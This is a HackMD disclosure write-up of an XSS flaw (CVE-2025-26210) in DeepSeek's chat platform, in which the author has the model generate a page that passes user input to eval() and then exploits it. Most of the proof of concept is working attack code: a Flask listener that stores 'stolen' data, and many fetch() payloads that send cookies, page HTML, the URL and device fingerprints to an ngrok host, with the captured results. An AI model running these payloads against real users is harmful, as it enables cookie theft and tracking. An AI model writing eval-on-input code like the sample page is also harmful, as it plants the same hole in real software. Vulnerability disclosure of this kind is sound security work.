deepseek XSS - HackMD

# deepseek XSS **CVE-2025-26210** >Attackers can leverage AI-generated insecure code to execute arbitrary JavaScript > > Injecting malicious payloads directly into input fields provided by the generated web application > > Exploiting insecure usage within AI-generated JavaScript > **Affected Versions** Versions from R1 to the latest V3.1 are all affected. This test was conducted after R1 and cannot guarantee that versions before R1 are not affected. This XSS vulnerability affects DeepSeek AI platform versions released on February 1, 2025. - DeepSeek-R1 model integration in chat.deepseek.com - https://api-docs.deepseek.com/news/news250120 ---- # POC I first asked deepseek to write a webpage containing a vulnerability and run it on the platform, because the platform itself can trigger XSS by uploading files or asking it to write a program. Then it wrote me an unsafe website like this ```python <!DOCTYPE html> <html> <head> <title>Unsafe Code Execution</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .container { max-width: 800px; margin: 0 auto; } form { background: #f4f4f4; padding: 20px; border-radius: 8px; } input[type="text"] { width: 300px; padding: 8px; } button { padding: 8px 16px; background: #007bff; color: white; border: none; border-radius: 4px; } pre { background: #333; color: white; padding: 15px; border-radius: 5px; } </style> </head> <body> <div class="container"> <h1>Unsafe Code Execution</h1> <form id="codeForm"> <label for="arg">Enter Argument (arg):</label> <input type="text" id="arg" name="arg" placeholder="e.g., 1; alert('Hacked!')" required> <button type="submit">Execute</button> </form> <h2>Result:</h2> <pre id="output"></pre> </div> <script> document.getElementById('codeForm').addEventListener('submit', (e) => { e.preventDefault(); const arg = document.getElementById('arg').value; const myvar = "varname"; try { eval(`${myvar} = ${arg};`); document.getElementById('output').textContent = `Executed: ${myvar} = ${arg}`; } catch (error) { document.getElementById('output').textContent = `Error: ${error.message}`; } }); </script> </body> </html> ``` I can attack directly like this ![image](https://hackmd.io/_uploads/ryQA8_49xg.png) After multiple tests, we decided to try a deeper attack. ![image](https://hackmd.io/_uploads/BydTqmad1g.png) ```python from flask import Flask, request app = Flask(__name__) @app.route('/', methods=['POST']) def handle_post(): data = request.data.decode('utf-8') with open('stolen_data.txt', 'a') as f: f.write(data + '\n') return 'Data received and saved', 200 if __name__ == '__main__': app.run(port=5000) #python3 payload.py ``` I can test whether I can get the cookie this way. fetch('[https://XXX. -free.app](https://XXX.ngrok-free.app/)', {method: 'POST', body: document.cookie}); Yes, it sent it back to my machine. ![image](https://hackmd.io/_uploads/ByQcLON5el.png) When I enter in the input box fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)', {method: 'POST', body: location.href}); fetch('https://XXX.ngrok-free.app', { method: 'POST', body: JSON.stringify(window.location.href) }); ``` "https://cdn.deepseek.com/usercontent/usercontent.html" ``` I saw a piece of data was sent back to my server ![image](https://hackmd.io/_uploads/Bk3lw_Vcgl.png) When we try to access these locations we get a 403 error. This is normal but also leaks the nginx version ![image](https://hackmd.io/_uploads/HyJcrmTdke.png) The following attempts to leak current user system information in various attack methods fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)',{method:'POST',body:navigator.userAgent}); ![image](https://hackmd.io/_uploads/By9aBmTdyg.png) fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)',{method:'POST',body:JSON.stringify({ua:navigator.userAgent,os:navigator.platform,lang:navigator.language})}); ```python {"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36","os":"Win32","lang":"en-US"} ``` Directly read what page the current user is on fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)',{method:'POST',body:document.documentElement.outerHTML}); ![image](https://hackmd.io/_uploads/BJwAH7p_1e.png) fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)', {method:'POST',body:JSON.stringify({globals:Object.keys(window)})}); ```python {"globals":["window","self","document","name","location","customElements","history","navigation","locationbar","menubar","personalbar","scrollbars","statusbar","toolbar","status","closed","frames","length","top","opener","parent","frameElement","navigator","origin","external","screen","innerWidth","innerHeight","scrollX","pageXOffset","scrollY","pageYOffset","visualViewport","screenX","screenY","outerWidth","outerHeight","devicePixelRatio","event","clientInformation","screenLeft","screenTop","styleMedia","onsearch","isSecureContext","trustedTypes","performance","onappinstalled","onbeforeinstallprompt","crypto","indexedDB","sessionStorage","localStorage","onbeforexrselect","onabort","onbeforeinput","onbeforematch","onbeforetoggle","onblur","oncancel","oncanplay","oncanplaythrough","onchange","onclick","onclose","oncontentvisibilityautostatechange","oncontextlost","oncontextmenu","oncontextrestored","oncuechange","ondblclick","ondrag","ondragend","ondragenter","ondragleave","ondragover","ondragstart","ondrop","ondurationchange","onemptied","onended","onerror","onfocus","onformdata","oninput","oninvalid","onkeydown","onkeypress","onkeyup","onload","onloadeddata","onloadedmetadata","onloadstart","onmousedown","onmouseenter","onmouseleave","onmousemove","onmouseout","onmouseover","onmouseup","onmousewheel","onpause","onplay","onplaying","onprogress","onratechange","onreset","onresize","onscroll","onsecuritypolicyviolation","onseeked","onseeking","onselect","onslotchange","onstalled","onsubmit","onsuspend","ontimeupdate","ontoggle","onvolumechange","onwaiting","onwebkitanimationend","onwebkitanimationiteration","onwebkitanimationstart","onwebkittransitionend","onwheel","onauxclick","ongotpointercapture","onlostpointercapture","onpointerdown","onpointermove","onpointerrawupdate","onpointerup","onpointercancel","onpointerover","onpointerout","onpointerenter","onpointerleave","onselectstart","onselectionchange","onanimationend","onanimationiteration","onanimationstart","ontransitionrun","ontransitionstart","ontransitionend","ontransitioncancel","onafterprint","onbeforeprint","onbeforeunload","onhashchange","onlanguagechange","onmessage","onmessageerror","onoffline","ononline","onpagehide","onpageshow","onpopstate","onrejectionhandled","onstorage","onunhandledrejection","onunload","crossOriginIsolated","scheduler","alert","atob","blur","btoa","cancelAnimationFrame","cancelIdleCallback","captureEvents","clearInterval","clearTimeout","close","confirm","createImageBitmap","fetch","find","focus","getComputedStyle","getSelection","matchMedia","moveBy","moveTo","open","postMessage","print","prompt","queueMicrotask","releaseEvents","reportError","requestAnimationFrame","requestIdleCallback","resizeBy","resizeTo","scroll","scrollBy","scrollTo","setInterval","setTimeout","stop","structuredClone","webkitCancelAnimationFrame","webkitRequestAnimationFrame","chrome","caches","cookieStore","ondevicemotion","ondeviceorientation","ondeviceorientationabsolute","launchQueue","sharedStorage","documentPictureInPicture","getScreenDetails","queryLocalFonts","showDirectoryPicker","showOpenFilePicker","showSaveFilePicker","originAgentCluster","onpageswap","onpagereveal","credentialless","fence","speechSynthesis","onscrollend","onscrollsnapchange","onscrollsnapchanging","webkitRequestFileSystem","webkitResolveLocalFileSystemURL","trustedOrigin","varname"]} ``` fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)', {method:'POST', body:JSON.stringify({screenInfo: {width: window.innerWidth, height: window.innerHeight, x: window.screenX, y: window.screenY}})}); ```python {"screenInfo":{"width":758,"height":699,"x":0,"y":0}} ``` fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)',{method:'POST',body:JSON.stringify({cpu:navigator.hardwareConcurrency,ram:navigator.deviceMemory})}); ```python {"cpu":16,"ram":8} ``` fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)', { method: 'POST', body: JSON.stringify({ hardwareConcurrency: navigator.hardwareConcurrency, deviceMemory: navigator.deviceMemory }) }); ```python {"hardwareConcurrency":16,"deviceMemory":8} ``` fetch('[https://XXX.ngrok-free.app](https://XXX.ngrok-free.app/)', { method: 'POST', body: JSON.stringify(performance.timing) }); ```python {"connectStart":1738654496434,"secureConnectionStart":1738654496476,"unloadEventEnd":0,"domainLookupStart":1738654496377,"domainLookupEnd":1738654496434,"responseStart":1738654496551,"connectEnd":1738654496512,"responseEnd":1738654496552,"requestStart":1738654496512,"domLoading":1738654496556,"redirectStart":0,"loadEventEnd":1738654496562,"domComplete":1738654496562,"navigationStart":1738654496372,"loadEventStart":1738654496562,"domContentLoadedEventEnd":1738654496562,"unloadEventStart":0,"redirectEnd":0,"domInteractive":1738654496562,"fetchStart":1738654496374,"domContentLoadedEventStart":1738654496562} ``` navigator.getBattery().then(battery => { fetch('https://XXX.ngrok-free.app', { method: 'POST', body: JSON.stringify({ batteryLevel: battery.level, isCharging: battery.charging }) }); }); ``` {"batteryLevel":1,"isCharging":true} ``` ## Demo https://youtu.be/IgQwy52FVT4 ## Update 2025/09 DeepSeek-V3.1 Even today, the latest version of DeepSeek is still vulnerable to XSS vulnerabilities. ![image](https://hackmd.io/_uploads/Hyu2E_Vclg.png) ## Related vulnerability discussion https://github.com/deepseek-ai/DeepSeek-V3/issues?q=XSS